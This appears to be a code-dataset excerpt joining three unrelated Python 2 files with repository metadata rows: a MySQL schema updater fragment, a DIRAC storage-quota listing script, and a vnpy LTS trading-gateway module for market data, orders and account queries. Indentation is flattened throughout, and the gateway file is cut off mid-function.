kw['unix_socket'] = info.unix_socket
else:
kw['host'] = info.host
kw['port'] = info.port
try:
conn = MySQLdb.connect(**kw)
except Exception, e:
if isinstance(e, MySQLdb.OperationalError):
msg = str(e.args[1])
else:
msg = str(e)
Utils.error('Failed to connect to mysql database %s: %s' % (info.db, msg))
return conn
def execute_sql(self, conn, sql):
cursor = conn.cursor()
try:
cursor.execute(sql)
conn.commit()
except Exception, e:
if isinstance(e, MySQLdb.OperationalError):
msg = str(e.args[1])
else:
msg = str(e)
Utils.error('Failed to execute sql: %s' % msg)
def apply_sqls(self, info, sql_path):
with open(sql_path, 'r') as fp:
lines = fp.read().split(';')
conn = self.get_conn(info)
for line in lines:
line = line.strip()
if not line:
continue
else:
self.execute_sql(conn, line)
def main():
version = sys.argv[1]
db_updater = DBUpdater.get_instance(version)
db_updater.update_db()
return 0
if __name__ == '__main__':
main()
| gpl-2.0 | 4,286,846,523,686,040,600 | 7,829,524,234,479,860 | 30.573099 | 97 | 0.562697 | false |
ic-hep/DIRAC | DataManagementSystem/scripts/dirac-admin-user-quota.py | 9 | 1201 | #!/usr/bin/env python
########################################################################
# $HeadURL$
########################################################################
__RCSID__ = "$Id$"
import DIRAC
from DIRAC.Core.Base import Script
Script.setUsageMessage( """
Show storage quotas for specified users or for all registered users if nobody is specified
Usage:
%s [user1 ...]
""" % Script.scriptName )
Script.parseCommandLine()
users = Script.getPositionalArgs()
from DIRAC import gLogger, gConfig
from DIRAC.Core.Security.ProxyInfo import getProxyInfo
if not users:
res = gConfig.getSections( '/Registry/Users' )
if not res['OK']:
gLogger.error( "Failed to retrieve user list from CS", res['Message'] )
DIRAC.exit( 2 )
users = res['Value']
gLogger.notice( "-"*30 )
gLogger.notice( "%s|%s" % ( 'Username'.ljust( 15 ), 'Quota (GB)'.rjust( 15 ) ) )
gLogger.notice( "-"*30 )
for user in sorted( users ):
quota = gConfig.getValue( '/Registry/Users/%s/Quota' % user, 0 )
if not quota:
quota = gConfig.getValue( '/Registry/DefaultStorageQuota' )
gLogger.notice( "%s|%s" % ( user.ljust( 15 ), str( quota ).rjust( 15 ) ) )
gLogger.notice( "-"*30 )
DIRAC.exit( 0 )
| gpl-3.0 | 4,452,453,468,560,978,400 | 1,676,564,529,566,534,700 | 30.605263 | 90 | 0.591174 | false |
cmbclh/vnpy1.7 | vnpy/trader/gateway/ltsGateway/ltsGateway.py | 7 | 47839 | # encoding: UTF-8
'''
vn.lts gateway integration
'''
import os
import json
from vnpy.api.lts import MdApi, QryApi, TdApi, defineDict
from vnpy.trader.vtFunction import getTempPath, getJsonPath
from vnpy.trader.vtGateway import *
# Below are some mapping dictionaries between VT types and LTS types
# Price type mapping
priceTypeMap= {}
priceTypeMap[PRICETYPE_LIMITPRICE] = defineDict["SECURITY_FTDC_OPT_LimitPrice"]
priceTypeMap[PRICETYPE_MARKETPRICE] = defineDict["SECURITY_FTDC_OPT_AnyPrice"]
priceTypeMap[PRICETYPE_FAK] = defineDict["SECURITY_FTDC_OPT_BestPrice"]
priceTypeMap[PRICETYPE_FOK] = defineDict["SECURITY_FTDC_OPT_AllLimitPrice"]
priceTypeMapReverse = {v: k for k, v in priceTypeMap.items()}
# Direction type mapping
directionMap = {}
directionMap[DIRECTION_LONG] = defineDict["SECURITY_FTDC_D_Buy"]
directionMap[DIRECTION_SHORT] = defineDict["SECURITY_FTDC_D_Sell"]
directionMapReverse = {v: k for k, v in directionMap.items()}
# Offset (open/close) type mapping
offsetMap = {}
offsetMap[OFFSET_OPEN] = defineDict["SECURITY_FTDC_OF_Open"]
offsetMap[OFFSET_CLOSE] = defineDict["SECURITY_FTDC_OF_Close"]
offsetMap[OFFSET_CLOSETODAY] = defineDict["SECURITY_FTDC_OF_CloseToday"]
offsetMap[OFFSET_CLOSEYESTERDAY] = defineDict["SECURITY_FTDC_OF_CloseYesterday"]
offsetMapReverse = {v:k for k,v in offsetMap.items()}
# Exchange type mapping
exchangeMap = {}
exchangeMap[EXCHANGE_SSE] = 'SSE'
exchangeMap[EXCHANGE_SZSE] = 'SZE'
exchangeMap[EXCHANGE_HKEX] = 'HGE'
exchangeMapReverse = {v:k for k,v in exchangeMap.items()}
# Position direction type mapping
posiDirectionMap = {}
posiDirectionMap[DIRECTION_NET] = defineDict["SECURITY_FTDC_PD_Net"]
posiDirectionMap[DIRECTION_LONG] = defineDict["SECURITY_FTDC_PD_Long"]
posiDirectionMap[DIRECTION_SHORT] = defineDict["SECURITY_FTDC_PD_Short"]
posiDirectionMapReverse = {v:k for k,v in posiDirectionMap.items()}
########################################################################################
class LtsGateway(VtGateway):
    """LTS gateway interface"""
#----------------------------------------------------------------------
def __init__(self, eventEngine, gatewayName='LTS'):
"""Constructor"""
super(LtsGateway, self).__init__(eventEngine, gatewayName)
self.mdApi = LtsMdApi(self)
self.tdApi = LtsTdApi(self)
self.qryApi = LtsQryApi(self)
self.mdConnected = False
self.tdConnected = False
self.qryConnected = False
        self.qryEnabled = False         # whether to start the periodic query loop
self.fileName = self.gatewayName + '_connect.json'
self.filePath = getJsonPath(self.fileName, __file__)
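        # For reference, the <gateway>_connect.json file loaded by connect()
        # below provides the keys read there; a minimal sketch with placeholder
        # values (addresses and credentials are illustrative only):
        # {
        #     "userID": "00000000",
        #     "mdPassword": "123456",
        #     "tdPassword": "123456",
        #     "brokerID": "2011",
        #     "mdAddress": "tcp://127.0.0.1:17002",
        #     "tdAddress": "tcp://127.0.0.1:17001",
        #     "qryAddress": "tcp://127.0.0.1:17003",
        #     "productInfo": "vnpy",
        #     "authCode": "000000"
        # }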
#----------------------------------------------------------------------
    def connect(self):
        """Connect"""
        # load the json config file
try:
f = file(self.filePath)
except IOError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'读取连接配置出错,请检查'
self.onLog(log)
return
        # parse the json file
setting = json.load(f)
try:
userID = str(setting['userID'])
mdPassword = str(setting['mdPassword'])
tdPassword = str(setting['tdPassword'])
brokerID = str(setting['brokerID'])
tdAddress = str(setting['tdAddress'])
mdAddress = str(setting['mdAddress'])
qryAddress = str(setting['qryAddress'])
productInfo = str(setting['productInfo'])
authCode = str(setting['authCode'])
except KeyError:
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'连接配置缺少字段,请检查'
self.onLog(log)
return
        # create the market data and trading API objects
self.mdApi.connect(userID, mdPassword, brokerID, mdAddress)
self.tdApi.connect(userID, tdPassword, brokerID, tdAddress, productInfo, authCode)
self.qryApi.connect(userID, tdPassword, brokerID, qryAddress, productInfo, authCode)
        # initialize and start the periodic query
self.initQuery()
self.startQuery()
#----------------------------------------------------------------------
    def subscribe(self, subscribeReq):
        """Subscribe to market data"""
self.mdApi.subscribe(subscribeReq)
#----------------------------------------------------------------------
    def sendOrder(self, orderReq):
        """Send order"""
return self.tdApi.sendOrder(orderReq)
#----------------------------------------------------------------------
    def cancelOrder(self, cancelOrderReq):
        """Cancel order"""
self.tdApi.cancelOrder(cancelOrderReq)
#----------------------------------------------------------------------
    def qryAccount(self):
        """Query account funds"""
self.qryApi.qryAccount()
#----------------------------------------------------------------------
    def qryPosition(self):
        """Query positions"""
self.qryApi.qryPosition()
#----------------------------------------------------------------------
    def close(self):
        """Close"""
if self.mdConnected:
self.mdApi.close()
if self.tdConnected:
self.tdApi.close()
if self.qryConnected:
self.qryApi.close()
#----------------------------------------------------------------------
    def initQuery(self):
        """Initialize the periodic query"""
if self.qryEnabled:
            # list of query functions to run in rotation
            self.qryFunctionList = [self.qryAccount, self.qryPosition]
            self.qryCount = 0           # query trigger countdown
            self.qryTrigger = 2         # query trigger threshold
            self.qryNextFunction = 0    # index of the query function run last time
self.startQuery()
#----------------------------------------------------------------------
    def query(self, event):
        """Query function registered on the event engine timer"""
self.qryCount += 1
if self.qryCount > self.qryTrigger:
            # reset the countdown
self.qryCount = 0
            # execute the query function
function = self.qryFunctionList[self.qryNextFunction]
function()
            # compute the index of the next query function; wrap back to 0 past the end of the list
self.qryNextFunction += 1
if self.qryNextFunction == len(self.qryFunctionList):
self.qryNextFunction = 0
#----------------------------------------------------------------------
    def startQuery(self):
        """Start the periodic query"""
self.eventEngine.register(EVENT_TIMER, self.query)
#----------------------------------------------------------------------
    def setQryEnabled(self, qryEnabled):
        """Set whether to enable the periodic query loop"""
self.qryEnabled = qryEnabled
########################################################################
class LtsMdApi(MdApi):
    """LTS market data API implementation"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""Constructor"""
super(LtsMdApi, self).__init__()
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name
        self.reqID = EMPTY_INT                  # request id
        self.connectionStatus = False           # connection status
        self.loginStatus = False                # login status
        self.subscribedSymbols = set()
        self.userID = EMPTY_STRING              # account
        self.password = EMPTY_STRING            # password
        self.brokerID = EMPTY_STRING            # broker id
        self.address = EMPTY_STRING             # server address
#----------------------------------------------------------------------
    def onFrontConnected(self):
        """Server connected callback"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接成功'
self.gateway.onLog(log)
self.login()
#----------------------------------------------------------------------
    def onFrontDisconnected(self,n):
        """Server disconnected callback"""
self.connectionStatus= False
self.loginStatus = False
self.gateway.mdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
    def onHeartBeatWarning(self, n):
        """Heartbeat warning"""
pass
#----------------------------------------------------------------------
    def onRspError(self,error,n,last):
        """Error callback"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspUserLogin(self, data, error, n, last):
        """Login response"""
        # if login succeeded, push a log event
if error['ErrorID'] == 0:
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器登录完成'
self.gateway.onLog(log)
            # re-subscribe the previously subscribed contracts
for subscribeReq in self.subscribedSymbols:
self.subscribe(subscribeReq)
        # otherwise, push an error event
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspUserLogout(self, data, error, n, last):
        """Logout response"""
        # if logout succeeded, push a log event
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'行情服务器登出完成'
self.gateway.onLog(log)
        # otherwise, push an error event
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspSubMarketData(self, data, error, n, last):
        """Contract subscription response"""
        # subscription errors are usually unimportant, so ignore them
pass
#----------------------------------------------------------------------
    def onRspUnSubMarketData(self, data, error, n, last):
        """Contract unsubscription response"""
        # same as above
pass
#----------------------------------------------------------------------
    def onRtnDepthMarketData(self, data):
        """Market data push"""
tick = VtTickData()
tick.gatewayName = self.gatewayName
tick.symbol = data['InstrumentID']
tick.exchange = exchangeMapReverse.get(data['ExchangeID'], u'未知')
tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])
tick.lastPrice = data['LastPrice']
tick.volume = data['Volume']
tick.openInterest = data['OpenInterest']
tick.time = '.'.join([data['UpdateTime'], str(data['UpdateMillisec']/100)])
tick.date = data['TradingDay']
tick.openPrice = data['OpenPrice']
tick.highPrice = data['HighestPrice']
tick.lowPrice = data['LowestPrice']
tick.preClosePrice = data['PreClosePrice']
tick.upperLimit = data['UpperLimitPrice']
tick.lowerLimit = data['LowerLimitPrice']
        # LTS provides 5 levels of market depth
tick.bidPrice1 = data['BidPrice1']
tick.bidVolume1 = data['BidVolume1']
tick.askPrice1 = data['AskPrice1']
tick.askVolume1 = data['AskVolume1']
tick.bidPrice2 = data['BidPrice2']
tick.bidVolume2 = data['BidVolume2']
tick.askPrice2 = data['AskPrice2']
tick.askVolume2 = data['AskVolume2']
tick.bidPrice3 = data['BidPrice3']
tick.bidVolume3 = data['BidVolume3']
tick.askPrice3 = data['AskPrice3']
tick.askVolume3 = data['AskVolume3']
tick.bidPrice4 = data['BidPrice4']
tick.bidVolume4 = data['BidVolume4']
tick.askPrice4 = data['AskPrice4']
tick.askVolume4 = data['AskVolume4']
tick.bidPrice5 = data['BidPrice5']
tick.bidVolume5 = data['BidVolume5']
tick.askPrice5 = data['AskPrice5']
tick.askVolume5 = data['AskVolume5']
self.gateway.onTick(tick)
#----------------------------------------------------------------------
    def connect(self, userID, password, brokerID, address):
        """Initialize the connection"""
        self.userID = userID            # account
        self.password = password        # password
        self.brokerID = brokerID        # broker id
        self.address = address          # server address
        # connect to the server if not already connected
if not self.connectionStatus:
            # create the API object in the C++ environment; the argument is the folder path used to save the .con files
path = getTempPath(self.gatewayName + '_')
self.createFtdcMdApi(path)
            # register the server address
self.registerFront(self.address)
            # initialize the connection; onFrontConnected is called on success
self.init()
        # if already connected but not yet logged in, log in
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
    def subscribe(self, subscribeReq):
        """Subscribe to a contract"""
req = {}
req['InstrumentID'] = str(subscribeReq.symbol)
req['ExchangeID'] = exchangeMap.get(str(subscribeReq.exchange), '')
        # by design, if subscribe is called before login is complete,
        # the request is saved first and re-sent automatically after login
if self.loginStatus:
self.subscribeMarketData(req)
self.subscribedSymbols.add(subscribeReq)
#----------------------------------------------------------------------
    def login(self):
        """Log in"""
        # log in only if the user id, password, etc. are filled in
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
    def close(self):
        """Close"""
self.exit()
########################################################################
class LtsTdApi(TdApi):
    """LTS trading API implementation"""
#----------------------------------------------------------------------
    def __init__(self, gateway):
        """Constructor of the API object"""
        super(LtsTdApi, self).__init__()
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name
        self.reqID = EMPTY_INT                  # request id
        self.orderRef = EMPTY_INT               # order reference
        self.connectionStatus = False           # connection status
        self.loginStatus = False                # login status
        self.userID = EMPTY_STRING              # account
        self.password = EMPTY_STRING            # password
        self.brokerID = EMPTY_STRING            # broker id
        self.address = EMPTY_STRING             # server address
        self.productInfo = EMPTY_STRING         # client product name
        self.authCode = EMPTY_STRING            # authorization code
        self.randCode = EMPTY_STRING            # random code
        self.frontID = EMPTY_INT                # front server id
        self.sessionID = EMPTY_INT              # session id
#----------------------------------------------------------------------
    def onFrontConnected(self):
        """Server connected callback"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接成功'
self.gateway.onLog(log)
        # after the front server connects, request the random auth code
self.reqID += 1
self.reqFetchAuthRandCode({}, self.reqID)
#----------------------------------------------------------------------
    def onFrontDisconnected(self, n):
        """Server disconnected callback"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器连接断开'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onHeartBeatWarning(self, n):
""""""
pass
#----------------------------------------------------------------------
    def onRspUserLogin(self, data, error, n, last):
        """Login response"""
        # if login succeeded, push a log event
if error['ErrorID'] == 0:
self.frontID = str(data['FrontID'])
self.sessionID = str(data['SessionID'])
self.loginStatus = True
self.gateway.mdConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登录完成'
self.gateway.onLog(log)
        # otherwise, push an error event
else:
err = VtErrorData()
err.gatewayName = self.gateway
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspUserLogout(self, data, error, n, last):
        """Logout response"""
        # if logout succeeded, push a log event
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
log.logContent = u'交易服务器登出完成'
self.gateway.onLog(log)
        # otherwise, push an error event
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspFetchAuthRandCode(self, data, error, n, last):
        """Random authentication code response"""
self.randCode = data['RandCode']
self.login()
#----------------------------------------------------------------------
def onRspUserPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspTradingAccountPasswordUpdate(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
    def onRspOrderInsert(self, data, error, n, last):
        """Order insert error (counter)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspOrderAction(self, data, error, n, last):
        """Order cancel error (counter)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRspError(self, error, n, last):
        """Error callback"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
    def onRtnOrder(self, data):
        """Order status callback"""
        # update the max order reference
newref = data['OrderRef']
self.orderRef = max(self.orderRef, int(newref))
        # create the order data object
order = VtOrderData()
order.gatewayName = self.gatewayName
        # save the symbol and order reference
order.symbol = data['InstrumentID']
order.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
order.vtSymbol = '.'.join([order.symbol, order.exchange])
order.orderID = data['OrderRef']
        # direction
if data['Direction'] == '0':
order.direction = DIRECTION_LONG
elif data['Direction'] == '1':
order.direction = DIRECTION_SHORT
else:
order.direction = DIRECTION_UNKNOWN
        # offset (open/close)
if data['CombOffsetFlag'] == '0':
order.offset = OFFSET_OPEN
elif data['CombOffsetFlag'] == '1':
order.offset = OFFSET_CLOSE
else:
order.offset = OFFSET_UNKNOWN
        # status
if data['OrderStatus'] == '0':
order.status = STATUS_ALLTRADED
elif data['OrderStatus'] == '1':
order.status = STATUS_PARTTRADED
elif data['OrderStatus'] == '3':
order.status = STATUS_NOTTRADED
elif data['OrderStatus'] == '5':
order.status = STATUS_CANCELLED
else:
order.status = STATUS_UNKNOWN
        # price, volume and other numeric fields
order.price = float(data['LimitPrice'])
order.totalVolume = data['VolumeTotalOriginal']
order.tradedVolume = data['VolumeTraded']
order.orderTime = data['InsertTime']
order.cancelTime = data['CancelTime']
order.frontID = data['FrontID']
order.sessionID = data['SessionID']
        # CTP order id consistency has to be maintained using the frontID, sessionID and orderID fields
order.vtOrderID = '.'.join([self.gatewayName, order.orderID])
        # push the event
self.gateway.onOrder(order)
#----------------------------------------------------------------------
    def onRtnTrade(self, data):
        """Trade callback"""
        # create the trade data object
trade = VtTradeData()
trade.gatewayName = self.gatewayName
        # save the symbol and order reference
trade.symbol = data['InstrumentID']
trade.exchange = exchangeMapReverse.get(data['ExchangeID'], '')
trade.vtSymbol = '.'.join([trade.symbol, trade.exchange])
trade.tradeID = data['TradeID']
trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])
trade.orderID = data['OrderRef']
trade.vtOrderID = '.'.join([self.gatewayName, trade.orderID])
        # Direction
trade.direction = directionMapReverse.get(data['Direction'], '')
        # Offset
trade.offset = offsetMapReverse.get(data['OffsetFlag'], '')
        # Price, volume and other numeric fields
trade.price = float(data['Price'])
trade.volume = data['Volume']
trade.tradeTime = data['TradeTime']
        # Push to gateway
self.gateway.onTrade(trade)
#----------------------------------------------------------------------
def onErrRtnOrderInsert(self, data, error):
"""发单错误回报(交易所)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onErrRtnOrderAction(self, data, error):
"""撤单错误回报(交易所)"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspFundOutByLiber(self, data, error, n, last):
"""LTS发起出金应答"""
pass
#----------------------------------------------------------------------
def onRtnFundOutByLiber(self, data):
"""LTS发起出金通知"""
pass
#----------------------------------------------------------------------
def onErrRtnFundOutByLiber(self, data, error):
"""LTS发起出金错误回报"""
pass
#----------------------------------------------------------------------
def onRtnFundInByBank(self, data):
"""银行发起入金通知"""
pass
#----------------------------------------------------------------------
def onRspFundInterTransfer(self, data, error, n, last):
"""资金内转应答"""
pass
#----------------------------------------------------------------------
def onRtnFundInterTransferSerial(self, data):
"""资金内转流水通知"""
pass
#----------------------------------------------------------------------
def onErrRtnFundInterTransfer(self, data, error):
"""资金内转错误回报"""
pass
#----------------------------------------------------------------------
def connect(self, userID, password, brokerID, address, productInfo, authCode):
"""初始化连接"""
self.userID = userID # 账号
self.password = password # 密码
self.brokerID = brokerID # 经纪商代码
self.address = address # 服务器地址
self.productInfo = productInfo
self.authCode = authCode
        # If the server connection has not been established yet, connect first
if not self.connectionStatus:
            # Create the API object on the C++ side; the argument is the folder path used to store the .con files
path = getTempPath(self.gatewayName + '_')
self.createFtdcTraderApi(path)
            # Set the data resync mode to push all of today's data
self.subscribePrivateTopic(0)
self.subscribePublicTopic(0)
            # Register the server address
self.registerFront(self.address)
            # Initialize the connection; onFrontConnected is called on success
self.init()
        # If already connected but not yet logged in, log in now
else:
if not self.loginStatus:
self.login()
#----------------------------------------------------------------------
def login(self):
"""连接服务器"""
# 如果填入了用户名密码等,则登录
if self.userID and self.password and self.brokerID:
req = {}
req['UserID'] = self.userID
req['Password'] = self.password
req['BrokerID'] = self.brokerID
req['UserProductInfo'] = self.productInfo
req['AuthCode'] = self.authCode
req['RandCode'] = self.randCode
self.reqID += 1
self.reqUserLogin(req, self.reqID)
#----------------------------------------------------------------------
def sendOrder(self, orderReq):
"""发单"""
self.reqID += 1
self.orderRef += 1
req = {}
req['InstrumentID'] = str(orderReq.symbol)
        req['LimitPrice'] = str(orderReq.price)    # prices in LTS are strings
req['VolumeTotalOriginal'] = int(orderReq.volume)
req['ExchangeID'] = exchangeMap.get(orderReq.exchange, '')
        # If a type passed in below is not supported by this interface, an empty string is returned
try:
req['OrderPriceType'] = priceTypeMap[orderReq.priceType]
req['Direction'] = directionMap[orderReq.direction]
req['CombOffsetFlag'] = offsetMap[orderReq.offset]
req['ExchangeID'] = exchangeMap[orderReq.exchange]
except KeyError:
return ''
req['OrderRef'] = str(self.orderRef)
req['InvestorID'] = self.userID
req['UserID'] = self.userID
req['BrokerID'] = self.brokerID
        req['CombHedgeFlag'] = defineDict['SECURITY_FTDC_HF_Speculation']       # speculation order
        req['ContingentCondition'] = defineDict['SECURITY_FTDC_CC_Immediately'] # send immediately
        req['ForceCloseReason'] = defineDict['SECURITY_FTDC_FCC_NotForceClose'] # not a forced liquidation
        req['IsAutoSuspend'] = 0                                                # no automatic suspension
        req['TimeCondition'] = defineDict['SECURITY_FTDC_TC_GFD']               # good for day
        req['VolumeCondition'] = defineDict['SECURITY_FTDC_VC_AV']              # any volume
        req['MinVolume'] = 1                                                    # minimum volume is 1
req['UserForceClose'] = 0
self.reqOrderInsert(req, self.reqID)
        # Return the order ID (a string) so that algorithms can manage the order dynamically
vtOrderID = '.'.join([self.gatewayName, str(self.orderRef)])
return vtOrderID
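        # Illustrative usage sketch (added; not part of the original file). It assumes a
        # VtOrderReq-like request object and the vn.py constants referenced by the maps above:
        #     req = VtOrderReq()
        #     req.symbol = '600036'
        #     req.exchange = EXCHANGE_SSE
        #     req.price = 10.5
        #     req.volume = 100
        #     req.priceType = PRICETYPE_LIMITPRICE
        #     req.direction = DIRECTION_LONG
        #     req.offset = OFFSET_OPEN
        #     vtOrderID = tdApi.sendOrder(req)    # returns '<gatewayName>.<orderRef>'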
#----------------------------------------------------------------------
def cancelOrder(self, cancelOrderReq):
"""撤单"""
self.reqID += 1
req = {}
req['InstrumentID'] = cancelOrderReq.symbol
req['ExchangeID'] = cancelOrderReq.exchange
req['OrderRef'] = cancelOrderReq.orderID
req['FrontID'] = cancelOrderReq.frontID
req['SessionID'] = cancelOrderReq.sessionID
req['ActionFlag'] = defineDict['SECURITY_FTDC_AF_Delete']
req['BrokerID'] = self.brokerID
req['InvestorID'] = self.userID
self.reqOrderAction(req, self.reqID)
#----------------------------------------------------------------------
def close(self):
"""关闭"""
self.exit()
########################################################################
class LtsQryApi(QryApi):
"""Lts账户查询实现"""
#----------------------------------------------------------------------
def __init__(self, gateway):
"""API对象的初始化函数"""
super(LtsQryApi, self).__init__()
        self.gateway = gateway                  # gateway object
        self.gatewayName = gateway.gatewayName  # gateway object name
        self.reqID = EMPTY_INT              # request ID
        self.orderRef = EMPTY_INT           # order reference
        self.connectionStatus = False       # connection status
        self.loginStatus = False            # login status
        self.userID = EMPTY_STRING          # account ID
        self.password = EMPTY_STRING        # password
        self.brokerID = EMPTY_STRING        # broker ID
        self.address = EMPTY_STRING         # server address
        self.productInfo = EMPTY_STRING     # client product name
        self.authCode = EMPTY_STRING        # authentication code
        self.randCode = EMPTY_STRING        # random code
        self.frontID = EMPTY_INT            # front server ID
        self.sessionID = EMPTY_INT          # session ID
#----------------------------------------------------------------------
def onFrontConnected(self):
"""服务器连接"""
self.connectionStatus = True
log = VtLogData()
log.gatewayName = self.gatewayName
        log.logContent = u'Query server connected'
self.gateway.onLog(log)
        # After the front server is connected, request the random code
self.reqID += 1
self.reqFetchAuthRandCode({}, self.reqID)
#----------------------------------------------------------------------
def onFrontDisconnected(self, n):
"""服务器断开"""
self.connectionStatus = False
self.loginStatus = False
self.gateway.tdConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
        log.logContent = u'Query server disconnected'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onHeartBeatWarning(self, n):
""""""
pass
#----------------------------------------------------------------------
def onRspError(self, error, n, last):
"""错误回报"""
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogin(self, data, error, n, last):
"""登陆回报"""
# 如果登录成功,推送日志信息
if error['ErrorID'] == 0:
self.frontID = str(data['FrontID'])
self.sessionID = str(data['SessionID'])
self.loginStatus = True
self.gateway.qryConnected = True
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = u'Query server login completed'
self.gateway.onLog(log)
            # Query instrument codes
self.reqID += 1
self.reqQryInstrument({}, self.reqID)
        # Otherwise, push the error message
else:
err = VtErrorData()
            err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspUserLogout(self, data, error, n, last):
"""登出回报"""
# 如果登出成功,推送日志信息
if error['ErrorID'] == 0:
self.loginStatus = False
self.gateway.qryConnected = False
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = u'Query server logout completed'
self.gateway.onLog(log)
        # Otherwise, push the error message
else:
err = VtErrorData()
err.gatewayName = self.gatewayName
err.errorID = error['ErrorID']
err.errorMsg = error['ErrorMsg'].decode('gbk')
self.gateway.onError(err)
#----------------------------------------------------------------------
def onRspFetchAuthRandCode(self, data, error, n, last):
"""请求随机认证码"""
self.randCode = data['RandCode']
self.login()
#----------------------------------------------------------------------
def onRspQryExchange(self, data, error, n, last):
pass
#----------------------------------------------------------------------
def onRspQryInstrument(self, data, error, n, last):
"""合约查询回报"""
contract = VtContractData()
contract.gatewayName = self.gatewayName
contract.symbol = data['InstrumentID']
contract.exchange = exchangeMapReverse[data['ExchangeID']]
contract.vtSymbol = '.'.join([contract.symbol, contract.exchange])
contract.name = data['InstrumentName'].decode('GBK')
        # Numeric fields of the instrument
contract.size = data['VolumeMultiple']
contract.priceTick = data['PriceTick']
contract.strikePrice = data['ExecPrice']
contract.underlyingSymbol = data['MarketID']
        # Product class
if data['ProductClass'] == '1':
contract.productClass = PRODUCT_FUTURES
elif data['ProductClass'] == '2':
contract.productClass = PRODUCT_OPTION
elif data['ProductClass'] == '3':
contract.productClass = PRODUCT_COMBINATION
elif data['ProductClass'] == '6':
contract.productClass = PRODUCT_EQUITY
elif data['ProductClass'] == '8':
contract.productClass = PRODUCT_EQUITY
else:
print data['ProductClass']
        # Option type
if data['InstrumentType'] == '1':
contract.optionType = OPTION_CALL
elif data['InstrumentType'] == '2':
contract.optionType = OPTION_PUT
        # Push to gateway
self.gateway.onContract(contract)
if last:
log = VtLogData()
log.gatewayName = self.gatewayName
            log.logContent = u'Trading instrument information retrieved'
self.gateway.onLog(log)
#----------------------------------------------------------------------
def onRspQryInvestor(self, data, error, n, last):
"""投资者查询回报"""
pass
#----------------------------------------------------------------------
def onRspQryTradingCode(self, data, error, n, last):
""""""
pass
#----------------------------------------------------------------------
def onRspQryTradingAccount(self, data, error, n, last):
"""资金账户查询回报"""
account = VtAccountData()
account.gatewayName = self.gatewayName
        # Account ID
account.accountID = data['AccountID']
account.vtAccountID = '.'.join([self.gatewayName, account.accountID])
        # Numeric fields
account.preBalance = data['PreBalance']
account.available = data['Available']
account.commission = data['Commission']
account.margin = data['CurrMargin']
#account.closeProfit = data['CloseProfit']
#account.positionProfit = data['PositionProfit']
